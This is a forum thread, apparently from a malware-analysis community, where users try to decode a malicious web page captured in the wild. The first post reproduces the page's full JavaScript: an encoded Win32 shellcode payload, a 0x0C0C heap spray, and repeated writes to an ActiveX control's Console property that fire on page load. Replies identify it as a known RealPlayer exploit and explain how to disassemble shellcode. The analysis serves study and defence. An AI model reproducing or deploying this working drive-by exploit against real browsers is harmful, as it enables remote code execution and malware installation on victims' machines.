decoding shell codes

[julevine]

i need help trying to decode this shellcode

i tried in malzilla but dont know how


Kaspersky = Exploit.JS.Agent.kk
 source of code
hxxp://www.play0nlink.com/ma/

start of code

Code: [Select]

<html>
 <head>
  <title>games</title>
  <script language="JavaScript" defer>
    function Check() {
     
   



var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4949%u4949%u4949%u4948%u4949%u4949%u5a51%u416a%u5058%u4230%u4131%u6b42%u4141%u4151%u4132%u3241%u4142%u4230%u5841%u3850%u4241%u4975%u4a79%u544b%u3250%u717a%u555a%u6963%u7159%u4e76%u6559%u536c%u6b31%u5030%u7634%u4d6a%u7a49%u6842%u5a7a%u634b%u6b35%u6a58%u6b4b%u4b4f%u494f%u506f%u3270%u4a6c%u4d39%u4c49%u7859%u7943%u376d%u3948%u5a39%u4f39%u6a69%u7239%u3832%u6a59%u7435%u6d52%u4f39%u4775%u7244%u4e32%u4f39%u3461%u4752%u7431%u4852%u6e6a%u4445%u5a52%u6e4d%u6d67%u4c31%u615a%u777a%u6d62%u6f37%u4e49%u437a%u3752%u5862%u4e57%u4e6d%u724a%u6a54%u586f%u484e%u7448%u6952%u4c36%u625a%u7442%u5052%u596b%u6c63%u6b57%u7270%u774a%u4a4f%u5a4d%u4b31%u4a70%u3466%u335a%u6d6e%u4b4d%u316c%u626b%u4b50%u7970%u6b56%u7477%u3652%u3534%u6b42%u6d6f%u4f6d%u726a%u317a%u6258%u4d58%u764a%u6d38%u707a%u3950%u476f%u6c62%u6551%u6b42%u6f6f%u4d75%u504a%u505a%u4458%u4d38%u4d4b%u664a%u6538%u5a42%u6d39%u514a%u774a%u5562%u4633%u3072%u646e%u515a%u4c4f%u4557%u3142%u4c59%u6f33%u596d%u7450%u6f31%u6c39%u6c59%u6d59%u4649%u737a%u6e6f%u3874%u4a4b%u726f%u5a46%u356e%u6f35%u7733%u3362%u6b71%u4c43%u6b58%u5470%u4e31%u4d44%u4d49%u4d49%u4549%u534a%u6d6f%u685a%u6b4f%u556f%u6f49%u3257%u4839%u616c%u7773%u4e69%u544f%u7859%u7747%u516a%u6d65%u4769%u3362%u6875%u4e73%u3859%u714a%u5876%u714e%u5165%u6d4e%u6c4d%u4f5a%u4935%u6d68%u6b67%u514c%u4b4e%u6d6d%u4d4a%u494d%u5971%u6e6c%u4f79%u4c69%u426a%u4979%u4f59%u6939%u385a%u684f%u7249%u6a46%u556e%u5535%u5042%u6a45%u6869%u514a%u4a76%u306e%u4f69%u4339%u6a56%u506e%u4c6d%u716a%u5749%u6545%u314c%u3849%u616c%u6b70%u6878%u384b%u784f%u354a%u6236%u4f6b%u5933%u6650%u7152%u326b%u6c57%u466a%u6139%u304a%u4d71%u626f%u5146%u5276%u4b46%u796e%u6a6c%u384d%u4a49%u594b%u4b66%u7a4a%u5978%u4b6d%u5a4d%u6b4b%u6b4c%u4a5a%u4c4a%u4b59%u4b6e%u6a4c%u6a4d%u6d6a%u6a30%u6a4a%u594d%u4c6c%u6b34%u7a6d%u6a50%u4b4b%u4b4c%u4a4a%u6c4d%u6836%u4b6b%u7a50%u5a78%u6839%u6a4e%u4c50%u6b37%u596c%u4b71%u384c%u6e7a%u4b79%u396c%u7a71%u4a50%u5a4d%u486d%u5871%u6b6b%u694c%u6b68%u4f4d%u6b69%u7865%u6876%u6b78%u4b4d%u6a65%u6b50%u684b%u6c6b%u3838%u596b%u6e70%u6c38%u6859%u786c%u386b%u5975%u5864%u3876%u6e77%u6a79%u6a6c%u6e6b%u6b35%u596d%u3866%u6c6e%u7a37%u5855%u7976%u6968%u5a6d%u396d%u6b66%u6c6f%u6b30%u5945%u7a6c%u4a78%u3339%u3258%u4354%u5044%u7670%u765a%u644f%u306f%u4377%u5147%u4667%u544e%u4230%u634c%u6451%u5039%u5230%u524e%u504c%u5069%u306e%u366b%u334e%u7053%u706f%u366d%u704f%u516d%u5471%u546f%u5538%u6139%u5471%u456e%u3035%u3078%u4b65%u4130");



var bigblock = unescape("%u0C0C%u0C0C");
var headersize = 20;
var slackspace = headersize + shellcode1.length;
while (bigblock.length < slackspace) bigblock += bigblock;
var fillblock = bigblock.substring(0,slackspace);
var block = bigblock.substring(0,bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;



var memory = new Array();
for (i = 0; i < 400; i++){ memory[i] = block + shellcode1 }

var buf = '';
while (buf.length < 32) buf = buf + unescape("%0C");

var m = '';

m = obj.Console;
obj.Console = buf;
obj.Console = m;

m = obj.Console;
obj.Console = buf;
obj.Console = m;


 }
 
   </script>
 
 
</head>
 <body onload="JavaScript: return Check();">
<object classid="clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93" id="obj">
Unable to create object
</object>

 </body>
</html>

 


[MysteryFCM]

From what I noticed whilst trying to decode it (failed miserably too), it seems to be a buffer overflow .... the first decodes to what seems to be a random string of rubbish when using Malzilla or doing it manually ... I'm hoping someone with a better understanding of JS than myself will come along and correct me if I'm wrong

Interestingly, and purely as an aside, when bypassing;

Code: [Select]

var slackspace = headersize + shellcode1.length;
With the shellcode.length part being replaced with the eval() value of the string, it sent Malzilla into a spiral that ended up with a complete crash ...

[cjeremy]

Does this look familiar: http://www.milw0rm.com/exploits/5332

This is what SANS said about it back in March: http://isc.incidents.org/diary.html?storyid=4120

[MysteryFCM]

Knew I'd seen it before ....... cheers for the ref

[tjs]

Hello. Here are my thoughts on this question.

The term 'shellcode' is overloaded but in most cases (such as this) it refers to binary data. Malzilla doesn't generally deal with binary data, so it's not the best tool for the job (but if you keep reading my long response you'll find that malzilla can do interesting things here).

How to understand shellcode is a complicated question because shellcode can essentially be thought of as a 'fragment' of a binary. Shellcode can store anything, including a decryptor stub so technically shellcode can be 'packed' or 'obfuscated' the same way a binary can. Anyway-- i'm not going to give people a history lesson on shellcode, nor am I going to teach you assembly (you can use google for that).

If you want to understand this shellcode, you need to first be comfortable with assembly language for the target platform. In this case the platform is win32. The shellcode here will be injected into the RealPlayer process, and eventually executed. In order to understand what it does you need to first:

1. unescape the shellcode variable
2. convert shellcode to hex
3. reverse the byte order (because Win32/IA32 is little endian)
4. disassemble the hex (you can use ollydbg or ida)

In most cases shellcode will be very tightly written to save space or to operate within the constraints of the vulnerable application. This shellcode is quite large. There are tools out there that will help you generate shellcode, but not too many that help you disassemble it. The best known and most widely used resource (imo) is Metasploit's Shellcode archive and dev kit (http://www.metasploit.com/shellcode/).

An alternative solution is to simply search the web for a fragment of the shellcode. Most kiddies that write exploits today don't write their own shellcode. The odds that you find documentation or a tutorial about the shellcode in question on the internet is high. As cjeremy pointed out, this exploit is known and documented. By reading the exploit source you'll notice that the shellcode was likely generated by metasploit (obviously the payload on milw0rm is not the same as the one found in the wild).

For those of you that are more interested in malware collection and such, but are still reading-- i can offer another tip: decoding simple shellcode can often lead to payload data. Many times a shellcode will do something like call out to urlmon.dll to download and execute some binary from a URL. If you simply decode the shellcode in malzilla, sometimes you can find the URL surrounded by random garbage (binary data). Keep in mind that this is like doing 'strings' on a binary. The shellcode authors may have put that there to throw you off, when the real payload is obfuscated.

If you want to learn more about shellcode, I suggest that you start with these papers:
- http://www.nologin.org/Downloads/Papers/win32-shellcode.pdf
- http://www.ngssoftware.com/research/papers/WritingSmallShellcode.pdf
- http://www.symantec.com/avcenter/reference/evolving.shell.code.pdf

This is a very old subject in security and as such it is very well documented.

Good luck!
TJS

[MysteryFCM]

Cheers TJS